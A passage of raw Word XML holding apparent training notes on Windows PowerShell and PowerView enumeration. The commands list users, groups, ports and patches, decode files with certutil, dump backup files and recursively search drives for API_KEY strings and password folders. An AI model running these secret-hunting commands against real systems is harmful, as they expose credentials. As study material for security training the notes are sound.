        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To get the current working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECC977" w14:textId="132F5F69" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Get-Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6C0534" w14:textId="4A4632BA" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To check if a specific PATH exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214E596" w14:textId="1396A780" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Location “&lt;PATH&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A4882F" w14:textId="38C791A0" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Get-Location “C:\Users\Administrators\Documents\Passwords”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A8921" w14:textId="2FBDC2DB" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If error, likely doesn’t exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE91704" w14:textId="375B29F3" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To make a request to a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE99805" w14:textId="3A83F24E" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72F37C6A" w14:textId="2B651B2B" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="007F2361" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To decode a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D008DA" w14:textId="5A37642B" w:rsidR="007F2361" w:rsidRPr="0084205E" w:rsidRDefault="00FD5A3D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -Path C:/ -Include </w:t>
      </w:r>
      <w:r w:rsidR="006A040B" w:rsidRPr="0084205E">
        <w:t>&lt;file&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -Recurse </w:t>
      </w:r>
      <w:r w:rsidR="006A040B" w:rsidRPr="0084205E">
        <w:t>-File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D0F2DF" w14:textId="5DAFFB14" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -decode “file PATH” file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC3284" w14:textId="23ECF3DB" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Content file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453D733" w14:textId="0E2E91FF" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t>Powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t>Powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Pro Tips on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE286A" w:rsidRPr="0084205E">
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F1F71E9" w14:textId="4F079CCD" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine how many users are on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721743EE" w14:textId="192BF9AF" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LocalUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47167BD3" w14:textId="3F29B951" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine which user is attached to a given SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB73AA8" w14:textId="5796F337" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LocalUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -SID “SID Number”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD6676" w14:textId="31271E27" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To get list of all users on local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC8234" w14:textId="4ACCADDB" w:rsidR="00011103" w:rsidRPr="0084205E" w:rsidRDefault="00011103" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07D90125" w14:textId="17C47AB1" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To determine which </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> have password required values set to false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A38D20" w14:textId="05B252DB" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LocalUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Select-Object Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PasswordRequired</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2521581A" w14:textId="61D7F813" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine number of existing local groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554EC16" w14:textId="7603669F" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="006A040B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LocalGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B84D18D" w14:textId="258D0E28" w:rsidR="006A040B" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To retrieve IP address info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64E588" w14:textId="38590A3B" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetIPAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AEA38BF" w14:textId="100BEBED" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine how many ports are listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34669DEB" w14:textId="647E2B82" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetTCPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Where-Object -Property State -Match Listen | Measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575809B8" w14:textId="7DCB6D8C" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine remote address of a specific port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003693B1" w14:textId="69EFBA51" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetTCPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -State Listen -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LocalPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port #&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBB302" w14:textId="1B5C1AE3" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To determine how many patches have been applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37802AB1" w14:textId="33ED4FBA" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Hotfix | Measure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32186478" w14:textId="29E6920B" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To find info about a specific patch ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D6C64" w14:textId="15DA3823" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Hotfix -ID &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA84146" w14:textId="4B61A047" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="009D13C9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To find the contents of a backup file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4EA7BE" w14:textId="080D86BA" w:rsidR="009D13C9" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -Path C:\ -Include *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>* -File -Recurse -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | Get-Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6312A" w14:textId="46005E4A" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To search for contents containing API_KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172E15C0" w14:textId="3C86C504" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> C:\* -Recurse | Select-String -Pattern API_KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940FD1A" w14:textId="48A583EB" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To list all running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C2ACEF" w14:textId="62908112" w:rsidR="00A30F47" w:rsidRPr="0084205E" w:rsidRDefault="00A30F47" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-Process</w:t>
      </w:r>
    </w:p>
